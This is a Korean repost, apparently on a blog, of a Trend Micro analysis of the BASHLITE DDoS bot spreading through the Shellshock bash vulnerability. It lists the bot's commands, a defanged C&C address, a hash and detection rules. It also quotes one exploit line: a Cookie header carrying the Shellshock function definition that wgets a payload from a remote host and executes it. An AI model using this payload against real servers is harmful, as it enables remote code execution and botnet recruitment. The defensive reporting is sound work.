Linux 등에서 사용되는 오픈 소스 프로그램 " Bourne Again SHell (bash) '에 취약점 " CVE-2014-7169'에 관한 보도가 있고 나서 몇 시간 후,이 취약점을 이용한 공격이 확인 된 보고되었습니다. 이 취약점을 이용하면 임의의 코드 실행이 가능하며, 시스템의 보안이 침해됩니다. 공격자가 Web 서버의 컨텐츠 수정, Web 사이트의 코드 변경, Web 사이트 변조, 데이터베이스에서 사용자 정보 절취 등 시나리오가됩니다.
트렌드 마이크로는이 취약점을 이용하여 시스템에 침입 한 악성 프로그램 샘플을 확인했습니다. "ELF_BASHLITE.A "또는"ELF_FLOODER.W "로 감지되는이 악성 프로그램은"분산 서비스 거부 (DDoS) 공격 '을 시작할 수 있습니다. 이 악성 프로그램은 다음의 관련 명령을 실행합니다.
- PING
- GETLOCALIP
- SCANNER
- HOLD - 특정 기간의 공격 중단 또는 지연
- JUNK - JUNK 명령에 의한 홍수의 실행
- UDP - UDP 패킷을 이용한 DDoS 공격
- TCP - TCP 패킷을 이용한 DDoS 공격
- KILLATTK? 공격 스레드를 중지
- LOLNOGTFO? 봇 정지
또한이 악성 프로그램은 "대입 공격 (무차별 대입 공격)"을 실행하는 기능을 갖추고 있으며, 공격자는 로그인 아이디와 암호 목록을 수집 할 수 있습니다. 당사에 분석에 따르면,이 악성 프로그램은 특정 명령 및 제어 (C & C) 서버에 연결하는 것을 확인할 수 있습니다. C & C 서버의 IP 주소는 다음과 같습니다.
- 89 [dot] 238 [dot] 150 [dot] 154 [colon] 5.
 |
다음은이 악성 프로그램의 시스템에 침입을 보였다 코드의 스크린 샷입니다.
Cookie : () {:;} ;. wget.-O. / tmp / besh. http : // <생략> <생략> .66.76 / nginx ; .chmod.777 / tmp / besh ;. / tmp / besh;
당사의 블로그 기사 " bash에 존재하는 취약점 "Shellshock": "CVE-2014-7169」및 「CVE-2014-6271" "에서 언급 한 바와 같이, Web 서버가 가장 영향을 받기 쉬운 것을 생각하면, 이 취약점은 매우 심각합니다.Linux 또는 bash는 "모두를 연결 인터넷 (IoE) '또는'사물의 인터넷 (IoT)"관련 기기에서도 사용되고 있기 때문에이 취약점은 이러한 기기에 위험을 초래할 수 있습니다. 또한 이번 취약점은 가상 통화 "Bitcoin (비트 코인)"과 비트 코인 마이닝에도 영향을 미치는 것으로보고되고 있습니다. 따라서 공격자는이 취약점을 이용하여 봇넷을 구축 할 수 있습니다.
Trend Micro 제품을 사용할 사용자가이 악성 프로그램 "BASHLITE"를 감지하는 당사의 클라우드 형 보안 기초 " Trend Micro Smart Protection Network "에 의해 지켜지고 있습니다. 당사는이 취약점을 이용한 공격을 계속 감시하고 있습니다.
Trend Micro는 Deep Discovery Inspector 위해 다음의 규칙을 공개하고,이를 통해이 취약점을 이용한 공격을 탐지 할 수 있습니다.
- 1618-Shellshock HTTP REQUEST
또한 트렌드 마이크로의 서버를위한 종합 보안 제품 " Trend Micro Deep Security (트렌드 마이크로 딥 보안) "은 다음과 침입 방지 (DPI) 규칙에 의해 bash에 존재하는 취약점으로부터 사용자를 보호합니다.
- 1006256-GNU Bash Remote Code Execution Vulnerability
덧붙여 "ELF_BASHLITE.A"관련 해시는 다음과 같습니다.
- 0229e6fa359bce01954651df2cdbddcdf3e24776
※ 협력 저자 : Rhena Inocencio 및 Karla Agregado, Kim Sotalbo, Joie Salvio, Erwina
참고 기사 :
- " Bash Vulnerability (Shellshock) Exploit Emerges in the Wild, Leads to BASHLITE Malware "
by Trend Micro
'취약점 정보1' 카테고리의 다른 글
| Bash bug: the other two RCEs, or how we chipped away at the original fix (CVE-2014-6277 and '78) (0) | 2014.10.02 |
|---|---|
| Update on CVE-2014-6271: Vulnerability in bash (shellshock) (0) | 2014.09.27 |
| bash에 존재하는 취약점 "Shellshock": "CVE-2014-7169」및 「CVE-2014-6271" (0) | 2014.09.27 |
| bash에 존재하는 「Shellshock "취약점에 대한주의 (0) | 2014.09.27 |
| Major Android Bug is a Privacy Disaster (CVE-2014-6041) (0) | 2014.09.19 |